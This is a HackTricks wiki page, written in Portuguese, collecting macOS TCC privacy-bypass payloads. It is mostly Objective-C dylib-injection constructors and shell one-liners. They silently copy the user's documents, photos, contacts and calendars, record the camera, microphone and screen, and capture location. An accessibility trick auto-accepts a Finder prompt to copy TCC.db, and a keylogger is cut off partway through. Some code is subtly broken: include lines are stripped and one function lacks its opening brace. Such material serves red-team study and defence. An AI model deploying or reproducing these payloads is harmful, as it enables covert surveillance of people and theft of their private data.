# macOS TCC Payloads {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} ### Desktop * **Entitlement**: Nenhum * **TCC**: kTCCServiceSystemPolicyDesktopFolder {% tabs %} {% tab title="ObjetiveC" %} Copie `$HOME/Desktop` para `/tmp/desktop`. ```objectivec #include #include #include #include #import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor)) void myconstructor(int argc, const char **argv) { freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager]; NSError *error = nil; // Get the path to the user's Pictures folder NSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@"Desktop"]; NSString *tmpPhotosPath = @"/tmp/desktop"; // Copy the contents recursively if (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) { NSLog(@"Error copying items: %@", error); } NSLog(@"Copy completed successfully.", error); fclose(stderr); // Close the file stream } ``` {% endtab %} {% tab title="Shell" %} Copie `$HOME/Desktop` para `/tmp/desktop`. ```bash cp -r "$HOME/Desktop" "/tmp/desktop" ``` {% endtab %} {% endtabs %} ### Documentos * **Direito**: Nenhum * **TCC**: `kTCCServiceSystemPolicyDocumentsFolder` {% tabs %} {% tab title="ObjetiveC" %} Copie `$HOME/Documents` para `/tmp/documents`. ```objectivec #include #include #include #include #import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor)) void myconstructor(int argc, const char **argv) { freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager]; NSError *error = nil; // Get the path to the user's Pictures folder NSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@"Documents"]; NSString *tmpPhotosPath = @"/tmp/documents"; // Copy the contents recursively if (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) { NSLog(@"Error copying items: %@", error); } NSLog(@"Copy completed successfully.", error); fclose(stderr); // Close the file stream } ``` {% endtab %} {% tab title="Shell" %} Copie `$HOME/`Documents para `/tmp/documents`. ```bash cp -r "$HOME/Documents" "/tmp/documents" ``` {% endtab %} {% endtabs %} ### Downloads * **Entitlement**: Nenhum * **TCC**: `kTCCServiceSystemPolicyDownloadsFolder` {% tabs %} {% tab title="ObjetiveC" %} Copie `$HOME/Downloads` para `/tmp/downloads`. ```objectivec #include #include #include #include #import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor)) void myconstructor(int argc, const char **argv) { freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager]; NSError *error = nil; // Get the path to the user's Pictures folder NSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@"Downloads"]; NSString *tmpPhotosPath = @"/tmp/downloads"; // Copy the contents recursively if (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) { NSLog(@"Error copying items: %@", error); } NSLog(@"Copy completed successfully.", error); fclose(stderr); // Close the file stream } ``` {% endtab %} {% tab title="Shell" %} Copie `$HOME/Dowloads` para `/tmp/downloads`. ```bash cp -r "$HOME/Downloads" "/tmp/downloads" ``` {% endtab %} {% endtabs %} ### Biblioteca de Fotos * **Direito**: `com.apple.security.personal-information.photos-library` * **TCC**: `kTCCServicePhotos` {% tabs %} {% tab title="ObjetiveC" %} Copie `$HOME/Pictures/Photos Library.photoslibrary` para `/tmp/photos`. ```objectivec #include #include #include #include #import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor)) void myconstructor(int argc, const char **argv) { freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager]; NSError *error = nil; // Get the path to the user's Pictures folder NSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@"Pictures/Photos Library.photoslibrary"]; NSString *tmpPhotosPath = @"/tmp/photos"; // Copy the contents recursively if (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) { NSLog(@"Error copying items: %@", error); } NSLog(@"Copy completed successfully.", error); fclose(stderr); // Close the file stream } ``` {% endtab %} {% tab title="Shell" %} Copie `$HOME/Pictures/Photos Library.photoslibrary` para `/tmp/photos`. ```bash cp -r "$HOME/Pictures/Photos Library.photoslibrary" "/tmp/photos" ``` {% endtab %} {% endtabs %} ### Contatos * **Direito**: `com.apple.security.personal-information.addressbook` * **TCC**: `kTCCServiceAddressBook` {% tabs %} {% tab title="ObjetiveC" %} Copie `$HOME/Library/Application Support/AddressBook` para `/tmp/contacts`. ```objectivec #include #include #include #include #import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor)) void myconstructor(int argc, const char **argv) { freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager]; NSError *error = nil; // Get the path to the user's Pictures folder NSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@"Library/Application Support/AddressBook"]; NSString *tmpPhotosPath = @"/tmp/contacts"; // Copy the contents recursively if (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) { NSLog(@"Error copying items: %@", error); } NSLog(@"Copy completed successfully.", error); fclose(stderr); // Close the file stream } ``` {% endtab %} {% tab title="Shell" %} Copie `$HOME/Library/Application Support/AddressBook` para `/tmp/contacts`. ```bash cp -r "$HOME/Library/Application Support/AddressBook" "/tmp/contacts" ``` {% endtab %} {% endtabs %} ### Calendário * **Direito**: `com.apple.security.personal-information.calendars` * **TCC**: `kTCCServiceCalendar` {% tabs %} {% tab title="ObjectiveC" %} Copie `$HOME/Library/Calendars` para `/tmp/calendars`. ```objectivec #include #include #include #include #import // gcc -dynamiclib -framework Foundation -o /tmp/inject.dylib /tmp/inject.m __attribute__((constructor)) void myconstructor(int argc, const char **argv) { freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt NSFileManager *fileManager = [NSFileManager defaultManager]; NSError *error = nil; // Get the path to the user's Pictures folder NSString *picturesPath = [NSHomeDirectory() stringByAppendingPathComponent:@"Library/Calendars/"]; NSString *tmpPhotosPath = @"/tmp/calendars"; // Copy the contents recursively if (![fileManager copyItemAtPath:picturesPath toPath:tmpPhotosPath error:&error]) { NSLog(@"Error copying items: %@", error); } NSLog(@"Copy completed successfully.", error); fclose(stderr); // Close the file stream } ``` {% endtab %} {% tab title="Shell" %} Copie `$HOME/Library/Calendars` para `/tmp/calendars`. ```bash cp -r "$HOME/Library/Calendars" "/tmp/calendars" ``` {% endtab %} {% endtabs %} ### Câmera * **Entitlement**: `com.apple.security.device.camera` * **TCC**: `kTCCServiceCamera` {% tabs %} {% tab title="ObjetiveC - Gravar" %} Grave um vídeo de 3s e salve-o em **`/tmp/recording.mov`** ```objectivec #import #import // gcc -framework Foundation -framework AVFoundation -dynamiclib CamTest.m -o CamTest.dylib // Code from: https://vsociety.medium.com/cve-2023-26818-macos-tcc-bypass-with-telegram-using-dylib-injection-part1-768b34efd8c4 @interface VideoRecorder : NSObject @property (strong, nonatomic) AVCaptureSession *captureSession; @property (strong, nonatomic) AVCaptureDeviceInput *videoDeviceInput; @property (strong, nonatomic) AVCaptureMovieFileOutput *movieFileOutput; - (void)startRecording; - (void)stopRecording; @end @implementation VideoRecorder - (instancetype)init { self = [super init]; if (self) { [self setupCaptureSession]; } return self; } - (void)setupCaptureSession { self.captureSession = [[AVCaptureSession alloc] init]; self.captureSession.sessionPreset = AVCaptureSessionPresetHigh; AVCaptureDevice *videoDevice = [AVCaptureDevice defaultDeviceWithMediaType:AVMediaTypeVideo]; NSError *error; self.videoDeviceInput = [[AVCaptureDeviceInput alloc] initWithDevice:videoDevice error:&error]; if (error) { NSLog(@"Error setting up video device input: %@", [error localizedDescription]); return; } if ([self.captureSession canAddInput:self.videoDeviceInput]) { [self.captureSession addInput:self.videoDeviceInput]; } self.movieFileOutput = [[AVCaptureMovieFileOutput alloc] init]; if ([self.captureSession canAddOutput:self.movieFileOutput]) { [self.captureSession addOutput:self.movieFileOutput]; } } - (void)startRecording { [self.captureSession startRunning]; NSString *outputFilePath = @"/tmp/recording.mov"; NSURL *outputFileURL = [NSURL fileURLWithPath:outputFilePath]; [self.movieFileOutput startRecordingToOutputFileURL:outputFileURL recordingDelegate:self]; NSLog(@"Recording started"); } - (void)stopRecording { [self.movieFileOutput stopRecording]; [self.captureSession stopRunning]; NSLog(@"Recording stopped"); } #pragma mark - AVCaptureFileOutputRecordingDelegate - (void)captureOutput:(AVCaptureFileOutput *)captureOutput didFinishRecordingToOutputFileAtURL:(NSURL *)outputFileURL fromConnections:(NSArray *)connections error:(NSError *)error { if (error) { NSLog(@"Recording failed: %@", [error localizedDescription]); } else { NSLog(@"Recording finished successfully. Saved to %@", outputFileURL.path); } } @end __attribute__((constructor)) static void myconstructor(int argc, const char **argv) { freopen("/tmp/logs.txt", "a", stderr); VideoRecorder *videoRecorder = [[VideoRecorder alloc] init]; [videoRecorder startRecording]; [NSThread sleepForTimeInterval:3.0]; [videoRecorder stopRecording]; [[NSRunLoop currentRunLoop] runUntilDate:[NSDate dateWithTimeIntervalSinceNow:3.0]]; fclose(stderr); // Close the file stream } ``` {% endtab %} {% tab title="ObjectiveC - Verificar" %} Verifique se o programa tem acesso à câmera. ```objectivec #import #import // gcc -framework Foundation -framework AVFoundation -dynamiclib CamTest.m -o CamTest.dylib // Code from https://vsociety.medium.com/cve-2023-26818-macos-tcc-bypass-with-telegram-using-dylib-injection-part1-768b34efd8c4 @interface CameraAccessChecker : NSObject + (BOOL)hasCameraAccess; @end @implementation CameraAccessChecker + (BOOL)hasCameraAccess { AVAuthorizationStatus status = [AVCaptureDevice authorizationStatusForMediaType:AVMediaTypeVideo]; if (status == AVAuthorizationStatusAuthorized) { NSLog(@"[+] Access to camera granted."); return YES; } else { NSLog(@"[-] Access to camera denied."); return NO; } } @end __attribute__((constructor)) static void telegram(int argc, const char **argv) { freopen("/tmp/logs.txt", "a", stderr); [CameraAccessChecker hasCameraAccess]; fclose(stderr); // Close the file stream } ``` {% endtab %} {% tab title="Shell" %} Tire uma foto com a câmera ```bash ffmpeg -framerate 30 -f avfoundation -i "0" -frames:v 1 /tmp/capture.jpg ``` {% endtab %} {% endtabs %} ### Microfone * **Direito**: **com.apple.security.device.audio-input** * **TCC**: `kTCCServiceMicrophone` {% tabs %} {% tab title="ObjetiveC - Gravar" %} Grave 5s de áudio e armazene em `/tmp/recording.m4a` ```objectivec #import #import // Code from https://www.vicarius.io/vsociety/posts/cve-2023-26818-exploit-macos-tcc-bypass-w-telegram-part-1-2 // gcc -dynamiclib -framework Foundation -framework AVFoundation Micexploit.m -o Micexploit.dylib @interface AudioRecorder : NSObject @property (strong, nonatomic) AVCaptureSession *captureSession; @property (strong, nonatomic) AVCaptureDeviceInput *audioDeviceInput; @property (strong, nonatomic) AVCaptureMovieFileOutput *audioFileOutput; - (void)startRecording; - (void)stopRecording; @end @implementation AudioRecorder - (instancetype)init { self = [super init]; if (self) { [self setupCaptureSession]; } return self; } - (void)setupCaptureSession { self.captureSession = [[AVCaptureSession alloc] init]; self.captureSession.sessionPreset = AVCaptureSessionPresetHigh; AVCaptureDevice *audioDevice = [AVCaptureDevice defaultDeviceWithMediaType:AVMediaTypeAudio]; NSError *error; self.audioDeviceInput = [[AVCaptureDeviceInput alloc] initWithDevice:audioDevice error:&error]; if (error) { NSLog(@"Error setting up audio device input: %@", [error localizedDescription]); return; } if ([self.captureSession canAddInput:self.audioDeviceInput]) { [self.captureSession addInput:self.audioDeviceInput]; } self.audioFileOutput = [[AVCaptureMovieFileOutput alloc] init]; if ([self.captureSession canAddOutput:self.audioFileOutput]) { [self.captureSession addOutput:self.audioFileOutput]; } } - (void)startRecording { [self.captureSession startRunning]; NSString *outputFilePath = [NSTemporaryDirectory() stringByAppendingPathComponent:@"recording.m4a"]; NSURL *outputFileURL = [NSURL fileURLWithPath:outputFilePath]; [self.audioFileOutput startRecordingToOutputFileURL:outputFileURL recordingDelegate:self]; NSLog(@"Recording started"); } - (void)stopRecording { [self.audioFileOutput stopRecording]; [self.captureSession stopRunning]; NSLog(@"Recording stopped"); } #pragma mark - AVCaptureFileOutputRecordingDelegate - (void)captureOutput:(AVCaptureFileOutput *)captureOutput didFinishRecordingToOutputFileAtURL:(NSURL *)outputFileURL fromConnections:(NSArray *)connections error:(NSError *)error { if (error) { NSLog(@"Recording failed: %@", [error localizedDescription]); } else { NSLog(@"Recording finished successfully. Saved to %@", outputFileURL.path); } NSLog(@"Saved to %@", outputFileURL.path); } @end __attribute__((constructor)) static void myconstructor(int argc, const char **argv) { freopen("/tmp/logs.txt", "a", stderr); AudioRecorder *audioRecorder = [[AudioRecorder alloc] init]; [audioRecorder startRecording]; [NSThread sleepForTimeInterval:5.0]; [audioRecorder stopRecording]; [[NSRunLoop currentRunLoop] runUntilDate:[NSDate dateWithTimeIntervalSinceNow:1.0]]; fclose(stderr); // Close the file stream } ``` {% endtab %} {% tab title="ObjectiveC - Verificar" %} Verifique se o aplicativo tem acesso ao microfone. ```objectivec #import #import // From https://vsociety.medium.com/cve-2023-26818-macos-tcc-bypass-with-telegram-using-dylib-injection-part1-768b34efd8c4 // gcc -framework Foundation -framework AVFoundation -dynamiclib MicTest.m -o MicTest.dylib @interface MicrophoneAccessChecker : NSObject + (BOOL)hasMicrophoneAccess; @end @implementation MicrophoneAccessChecker + (BOOL)hasMicrophoneAccess { AVAuthorizationStatus status = [AVCaptureDevice authorizationStatusForMediaType:AVMediaTypeAudio]; if (status == AVAuthorizationStatusAuthorized) { NSLog(@"[+] Access to microphone granted."); return YES; } else { NSLog(@"[-] Access to microphone denied."); return NO; } } @end __attribute__((constructor)) static void telegram(int argc, const char **argv) { [MicrophoneAccessChecker hasMicrophoneAccess]; } ``` {% endtab %} {% tab title="Shell" %} Grave um áudio de 5s e armazene-o em `/tmp/recording.wav` ```bash # Check the microphones ffmpeg -f avfoundation -list_devices true -i "" # Use microphone from index 1 from the previous list to record ffmpeg -f avfoundation -i ":1" -t 5 /tmp/recording.wav ``` {% endtab %} {% endtabs %} ### Localização {% hint style="success" %} Para que um aplicativo obtenha a localização, **Serviços de Localização** (de Privacidade e Segurança) **devem estar ativados,** caso contrário, não conseguirá acessá-la. {% endhint %} * **Direito**: `com.apple.security.personal-information.location` * **TCC**: Concedido em `/var/db/locationd/clients.plist` {% tabs %} {% tab title="ObjectiveC" %} Escreva a localização em `/tmp/logs.txt` ```objectivec #include #include #import #import @interface LocationManagerDelegate : NSObject @end @implementation LocationManagerDelegate - (void)locationManager:(CLLocationManager *)manager didUpdateLocations:(NSArray *)locations { CLLocation *location = [locations lastObject]; NSLog(@"Current location: %@", location); exit(0); // Exit the program after receiving the first location update } - (void)locationManager:(CLLocationManager *)manager didFailWithError:(NSError *)error { NSLog(@"Error getting location: %@", error); exit(1); // Exit the program on error } @end __attribute__((constructor)) void myconstructor(int argc, const char **argv) { freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt NSLog(@"Getting location"); CLLocationManager *locationManager = [[CLLocationManager alloc] init]; LocationManagerDelegate *delegate = [[LocationManagerDelegate alloc] init]; locationManager.delegate = delegate; [locationManager requestWhenInUseAuthorization]; // or use requestAlwaysAuthorization [locationManager startUpdatingLocation]; NSRunLoop *runLoop = [NSRunLoop currentRunLoop]; while (true) { [runLoop runUntilDate:[NSDate dateWithTimeIntervalSinceNow:1.0]]; } NSLog(@"Location completed successfully."); freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt } ``` {% endtab %} {% tab title="Shell" %} Obtenha acesso à localização ``` ??? ``` {% endtab %} {% endtabs %} ### Gravação de Tela * **Direito**: Nenhum * **TCC**: `kTCCServiceScreenCapture` {% tabs %} {% tab title="ObjectiveC" %} Grave a tela principal por 5s em `/tmp/screen.mov` ```objectivec #import #import // clang -framework Foundation -framework AVFoundation -framework CoreVideo -framework CoreMedia -framework CoreGraphics -o ScreenCapture ScreenCapture.m @interface MyRecordingDelegate : NSObject @end @implementation MyRecordingDelegate - (void)captureOutput:(AVCaptureFileOutput *)output didFinishRecordingToOutputFileAtURL:(NSURL *)outputFileURL fromConnections:(NSArray *)connections error:(NSError *)error { if (error) { NSLog(@"Recording error: %@", error); } else { NSLog(@"Recording finished successfully."); } exit(0); } @end __attribute__((constructor)) void myconstructor(int argc, const char **argv) freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt AVCaptureSession *captureSession = [[AVCaptureSession alloc] init]; AVCaptureScreenInput *screenInput = [[AVCaptureScreenInput alloc] initWithDisplayID:CGMainDisplayID()]; if ([captureSession canAddInput:screenInput]) { [captureSession addInput:screenInput]; } AVCaptureMovieFileOutput *fileOutput = [[AVCaptureMovieFileOutput alloc] init]; if ([captureSession canAddOutput:fileOutput]) { [captureSession addOutput:fileOutput]; } [captureSession startRunning]; MyRecordingDelegate *delegate = [[MyRecordingDelegate alloc] init]; [fileOutput startRecordingToOutputFileURL:[NSURL fileURLWithPath:@"/tmp/screen.mov"] recordingDelegate:delegate]; // Run the loop for 5 seconds to capture dispatch_after(dispatch_time(DISPATCH_TIME_NOW, (int64_t)(5 * NSEC_PER_SEC)), dispatch_get_main_queue(), ^{ [fileOutput stopRecording]; }); CFRunLoopRun(); freopen("/tmp/logs.txt", "w", stderr); // Redirect stderr to /tmp/logs.txt } ``` {% endtab %} {% tab title="Shell" %} Grave a tela principal por 5s ```bash screencapture -V 5 /tmp/screen.mov ``` {% endtab %} {% endtabs %} ### Acessibilidade * **Direito**: Nenhum * **TCC**: `kTCCServiceAccessibility` Use o privilégio TCC para aceitar o controle do Finder pressionando enter e contornar o TCC dessa forma {% tabs %} {% tab title="Aceitar TCC" %} ```objectivec #import #import #import // clang -framework Foundation -framework ApplicationServices -framework OSAKit -o ParallelScript ParallelScript.m // TODO: Improve to monitor the foreground app and press enter when TCC appears void SimulateKeyPress(CGKeyCode keyCode) { CGEventRef keyDownEvent = CGEventCreateKeyboardEvent(NULL, keyCode, true); CGEventRef keyUpEvent = CGEventCreateKeyboardEvent(NULL, keyCode, false); CGEventPost(kCGHIDEventTap, keyDownEvent); CGEventPost(kCGHIDEventTap, keyUpEvent); if (keyDownEvent) CFRelease(keyDownEvent); if (keyUpEvent) CFRelease(keyUpEvent); } void RunAppleScript() { NSLog(@"Starting AppleScript"); NSString *scriptSource = @"tell application \"Finder\"\n" "set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias\n" "set targetFolder to POSIX file \"/tmp\" as alias\n" "duplicate file sourceFile to targetFolder with replacing\n" "end tell\n"; NSDictionary *errorDict = nil; NSAppleScript *appleScript = [[NSAppleScript alloc] initWithSource:scriptSource]; [appleScript executeAndReturnError:&errorDict]; if (errorDict) { NSLog(@"AppleScript Error: %@", errorDict); } } int main() { @autoreleasepool { dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{ RunAppleScript(); }); // Simulate pressing the Enter key every 0.1 seconds NSLog(@"Starting key presses"); for (int i = 0; i < 10; ++i) { SimulateKeyPress((CGKeyCode)36); // Key code for Enter usleep(100000); // 0.1 seconds } } return 0; } ``` {% endtab %} {% tab title="Keylogger" %} Armazene as teclas pressionadas em **`/tmp/keystrokes.txt`** ```objectivec #import #import #import // clang -framework Foundation -framework ApplicationServices -framework Carbon -o KeyboardMonitor KeyboardMonitor.m NSString *const kKeystrokesLogPath = @"/tmp/keystrokes.txt"; void AppendStringToFile(NSString *str, NSString *filePath) { NSFileHandle *fileHandle = [NSFileHandle fileHandleForWritingAtPath:filePath]; if (fileHandle) { [fileHandle seekToEndOfFile]; [fileHandle writeData:[str dataUsingEncoding:NSUTF8StringEncoding]]; [fileHandle closeFile]; } else { // If the file does not exist, create it [str writeToFile:filePath atomically:YES encoding:NSUTF8StringEncoding error:nil]; } } CGEventRef KeyboardEventCallback(CGEventTapProxy proxy, CGEventType type, CGEventRef event, void *refcon) { if (type == kCGEventKeyDown) { CGKeyCode keyCode = (CGKeyCode)CGEventGetIntegerValueField(event, kCGKeyboardEventKeycode); NSString *keyString = nil; // First, handle special non-printable keys switch (keyCode) { case kVK_Return: keyString = @""; break; case kVK_Tab: keyString = @""; break; case kVK_Space: keyString = @""; break; case kVK_Delete: keyString = @""; break; case kVK_Escape: keyString = @""; break; case kVK_Command: keyString = @""; break; case kVK_Shift: keyString = @""; break; case kVK_CapsLock: keyString = @""; break; case kVK_Option: keyString = @"